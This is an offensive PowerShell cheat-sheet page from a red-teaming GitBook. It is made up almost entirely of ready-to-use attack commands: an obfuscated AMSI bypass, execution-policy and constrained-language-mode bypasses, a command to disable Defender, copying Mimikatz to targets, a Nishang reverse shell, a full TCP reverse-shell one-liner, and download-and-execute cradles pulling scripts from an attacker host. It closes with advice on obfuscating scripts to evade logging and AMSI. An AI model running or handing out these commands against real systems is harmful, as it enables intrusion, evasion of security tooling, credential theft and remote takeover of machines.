🕺
CheatSheets
  • Introduction
  • Getting Started With Hacking
  • VMs on Mac
  • Windows
    • Enumeration
    • Local Privilege Escalation
    • UAC Bypasses
    • Persistance
    • Networking
  • Active Directory
    • Offensive Powershell
    • Enumeration
      • BloodHound
    • Lateral Movement
    • Escalation
      • ACL Abuse
      • Kerberoasting
      • Un-Constrained Delegation
      • JEA
    • Persistance
    • Mimikatz
    • Alternate Cred Dumps
    • MSSQL
    • Defences and Bypasses
    • Setting Up a Lab
  • Red Teaming
    • Phishing Payloads
    • Cobalt Strike
    • Metasploit
    • Sliver
  • Linux
    • Networking
    • Enumeration
    • Local Privilege Escalation
    • Persistance
    • MySQL
  • Mainframes
    • HP Nonstop
    • IBM z/OS
  • Cloud
    • AWS
    • GCP
    • Azure
  • Web App
    • Tomcat
    • SQLMap
    • PHP
  • Mobile
    • Android
    • iOS
  • Exploit-Dev
    • Linux
      • Basic Stack Overflows
      • Bypassing NX (DEP)
      • Bypassing ASLR
    • Shellcode
    • Windows
  • WiFi
    • Alfa AWUS036ACH Setup
    • Aircrack-ng
Powered by GitBook
On this page
  • Pass Creds
  • AMSI Bypass
  • Execution Policy
  • Help
  • Checking Language Mode
  • Disabling Constrained Language Mode
  • Applocker Policy
  • Disable Defender
  • Copy File to target
  • Reverse Shell Nishang
  • Reverse Shell Listener
  • Reverse Shell One Liner
  • IEX
  • Ping Sweep
  • Testing Ports
  • Obfuscation

Was this helpful?

  1. Active Directory

Offensive Powershell

Pass Creds

# If you have RDP access and can get a prompt
$cred = Get-Credential Domain\Username
invoke-command -Credential $cred -computername x -scriptblock {whoami}

# If you are over C2 and cant get a prompt
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami}

AMSI Bypass

sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Execution Policy

powershell -ep bypass

Help

Get-Help

Checking Language Mode

$ExecutionContext.SessionState.LanguageMode

When constrained can add the functions at end of script.

E.G: Putting "invoke-mimikatz" and the end of Invoke-Mimikatz.ps1 to call it since language wont let you.

Disabling Constrained Language Mode

Note: This only works if its set locally. Needs to be run as system and is two underscores.

# Check (4 = constrained, 8 = unconstrained)
$env:__PSLockDownPolicy

# Change
setx __PSLockdownPolicy "8" /M

Applocker Policy

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Disable Defender

Set-MpPreference -DisableRealtimeMonitoring $true -Verbose

Copy File to target

Copy-Item .\Invoke-Mimikatz.ps1 \\target.local\c$\'Program Files'
Copy-Item C:\file C:\Users\target\ -ToSession $sess
Copy-Item C:\Users\target\file C:\ -FromSession $sess

Reverse Shell Nishang

powershell.exe iex (iwr http://172.16.100.218/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.218 -Port 443)

Might need to modify nishang script first so that the function name is correct.

Reverse Shell Listener

Import-Module .\powercat.ps1
powercat -l -v -p 443

Reverse Shell One Liner

$client = New-Object System.Net.Sockets.TCPClient("172.16.1.23",6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

IEX

powershell.exe iex (iwr http://attacker.ip/Script.ps1 -UseBasicParsing); script-function -arg1 -arg2

powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://attacker.ip/Script.ps1'))

Ping Sweep

# Sweep computers in a /24 subnet
1..255 | % {"192.168.1.$($_): $(Test-Connection -count 1 -comp 192.168.1.$($_) -quiet)"}

Testing Ports

Test-NetConnection -ComputerName <name> -Port <port>

# Nishang
Invoke-PortScan -StartAddress <IP> -EndAddress <IP> [-PortScan] [-Port <>]

Obfuscation

PreviousNetworkingNextEnumeration

Last updated 25 days ago

Was this helpful?

Obfuscation defeats script block logging, warning level auto logging and AMSI when done right. As a very simple example, we have already seen how GetField becomes GetFiel`d to bypass warning level auto logging. Invoke-Obfuscation and Invoke-CradleCrafter from Daniel () are very useful for implementing obfuscation.

Obfuscated scripts can be spotted by comparing common characteristics like variable names, function names, character frequency, distribution of language operators, entropy etc. Revoke-Obfusction () is one such tool for identifying obfuscated scripts from event logs. Bonus: To avoid detection of obfuscation we can use minimal obfuscation by identifying the exact signature which gets detected and obfuscating only that part of the script. See:

https://github.com/danielbohannon
https://github.com/danielbohannon/RevokeObfuscation
https://cobbr.io/PSAmsiMinimizing-Obfuscation-To-Maximize-Stealth.html